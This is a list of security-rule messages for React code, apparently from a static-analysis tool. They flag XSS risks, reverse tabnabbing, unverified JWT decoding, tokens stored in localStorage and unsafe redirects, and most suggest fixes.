React security best practices
Detected setting HTML from code. This is risky because it’s easy to inadvertently expose your users to a cross-site scripting (XSS) attack. This can lead to attackers accessing sensitive information. Instead, do this without dangerouslySetInnerHTML or use DOMPurify to santize your HTML.
Overwriting `transformLinkUri` or `transformImageUri` to something insecure or turning `allowDangerousHtml` on, will open code up to XSS vectors.
Password can be leaked if CSS injection exists on the page.
This HTML element '$EL' and attribute '$ATTR' together may load an external resource. This means that if dynamic content can enter this attribute it may be possible for an attacker to send HTTP requests to unintended locations which may leak data about your users. If this element is reaching out to a known host, consider hardcoding the host (or loading from a configuration) and appending the dynamic path. See https://github.com/cure53/HTTPLeaks for more information.
Unencrypted request over HTTP detected.
User controlled data in a styled component's css is an anti-pattern that can lead to XSS vulnerabilities
User controlled data in a insertAdjacentHTML, document.write or document.writeln is an anti-pattern that can lead to XSS vulnerabilities
User controlled data in a `$X` is an anti-pattern that can lead to XSS vulnerabilities
This anchor tag with 'target="_blank"' is missing 'noreferrer'. A page opened with 'target="_blank"' can access the window object of the origin page. This means it can manipulate the 'window.opener' property, which could redirect the origin page to a malicious URL. This is called reverse tabnabbing. To prevent this, include 'rel=noreferrer' on this tag.
Injecting props into a new React Element may introduce an XSS vulnerability if the props contains a user-controllable object (such as a `dangerouslySetInnerHTML` expression).
It is a bad practice to stop the data flow in rendering by copying props into state.
Property decoded from JWT token without verifying and cannot be trustworthy.
Storing JWT tokens in localStorage known to be a bad practice, consider moving your tokens from localStorage to a HTTP cookie.
User controlled data in <Redirect /> can lead to unpredicted redirects.